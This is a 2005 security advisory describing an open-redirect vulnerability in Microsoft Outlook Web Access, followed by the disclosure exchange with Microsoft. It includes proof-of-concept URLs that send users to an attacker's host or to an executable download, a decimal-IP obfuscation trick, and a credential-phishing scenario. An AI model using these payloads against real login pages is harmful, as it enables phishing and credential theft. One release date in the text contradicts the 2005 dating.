Exploit Labs Security Advisory 2005.1

2005-02-22T00:00:00
ID PACKETSTORM:36079
Type packetstorm
Reporter Donnie Werner
Modified 2005-02-22T00:00:00

Description

                                        
                                            `------------------------------------------------------------  
- EXPL-A-2005-001 exploitlabs.com Advisory 030 -  
------------------------------------------------------------  
- Microsoft Outlook Web Access -  
  
  
  
OVERVIEW  
========  
A vulnerability in Microsoft Outlook Web Access allows malicious  
attackers to redirect the login to any URL they wish.  
This allows the attacker to force the user to the site of the  
attackers choosing enabling the attacker to use social engenering  
and phishing style of attacks.  
  
  
AFFECTED PRODUCTS  
=================  
Microsoft Outlook Web Access ( OWA )  
Windows 2003  
  
  
DETAILS  
=======  
By using specialy crafted URL an attacker can cause the user  
to redirected to an arbitrary URL to the end user.  
  
  
ATTACK PROFILE  
==============  
An attacker could gather known user email address for a company  
that uses OWA. By appending an obfuscated redirected url with a  
encoded url such as  
  
https://[owa-host]/exchweb/bin/auth/owalogon.asp?url=http://3221234342/  
  
this will take the user to http://example.com when the login box  
is pressed, and a user is more likely to trust the url.  
This would be used to send a link to the trusted login.  
The attacker can then have a page to capture the user / password  
and redirect back to the original login page or some other form of  
phishing attack ( or other trusted URL attacks )  
  
  
SOLUTION  
========  
Microsoft was contacted on Jan 20, 2005  
NO patch has been produced to correct the vulnerability.  
They have issued the following: on Jan 21, 2005  
( see VENDOR RESPONSE )  
This release is dated Jan 25, 2007  
  
  
PROOF OF CONCEPT  
================  
  
1.https://[owa-host]/exchweb/bin/auth/owalogon.asp?url=http://[otherhost]  
  
2.  
https://[owa-host]/exchweb/bin/auth/owalogon.asp?url=http://[otherhost/file.exe]  
  
click "login"  
  
  
after injection into the form, the source reveals...  
  
<BODY scroll="AUTO" bgColor="#3D5FA3" text="#000000" leftMargin=0  
topMargin=0>  
<FORM action="/exchweb/bin/auth/owaauth.dll" method="POST"  
name="logonForm"  
autocomplete="off">  
<INPUT type="hidden" name="destination"  
value="http://[otherhost/file.exe]">  
<INPUT type="hidden" name="flags" value="0">  
<TABLE id="borderTable" class="standardTable" cellSpacing=0  
cellPadding=0  
height="100%" width="100%" bgColor="#3D5FA3" border=0>  
  
note:  
the [otherhost] may easily be obfuscated so as to not alarm the targeted  
user(s) such as  
https://[owa-host]/exchweb/bin/auth/owalogon.asp?url=http://3221234342/  
( http://example.com )  
  
  
notes:  
example 1 redirects the user to a url of the attackers choosing.  
example 2 prompts the user to download an executable or other file.  
this could be used in conjunction with the aforementioned attack scenario.  
  
  
CREDITS  
=======  
This vulnerability was discovered and researched by  
Donnie Werner of exploitlabs.com  
  
Donnie Werner  
se_cur_ity@hotmail.com  
morning_wood@zone-h.org  
--   
Web: http://exploitlabs.com  
http://zone-h.org  
  
  
  
VENDOR RESPONSE  
===============  
  
researcher inital:  
------------------  
Dear Microsoft,  
The following discusses a potential security vulnerability affecting  
one of your products. We are bringing it to your attention in order to  
assist you in investigating it and determining the appropriate actions,  
and have provided preliminary information about the potential  
vulnerability below. Please read our disclosure policy, available at  
http://www.exploitlabs.com/disclosure-policy.html if you have any  
questions.  
Please confirm using the contact information I have provided below that  
you have received this note.  
  
We look forward to working with you,  
  
Exploitlabs Research Team  
  
Donnie Werner  
se_cur_ity@hotmail.com  
  
  
vendor response 1  
-----------------  
Hello Donnie,  
  
Thanks very much for contacting us. We have investigated reports of this  
behavior in the past and plan to fix it in the next major release of  
Exchange. Please let me know if you have further questions.  
  
Thanks,  
Christopher, CISSP  
  
  
researcher initial 2  
--------------------  
Christopher,  
when is the "next major release of Exchange" due?  
I think it may be in the interest of admins to know this  
flaw exists, and to possibly alert thier users of potential  
phishing attacks and to help secure their systems.  
Exchange 2003 OWA is used extensivly in corporate  
environments, where this flaw will have the most impact  
being this is a moderate remote threat, this researcher  
feels that PUBLIC FULL DISCLOSURE is needed.  
possibly MS would be willing to issue a statement to  
the public regarding this issue at this time.  
  
regards,  
  
Donnie Werner ( no fancy letters )  
  
vendor response 2  
-----------------  
(none)  
`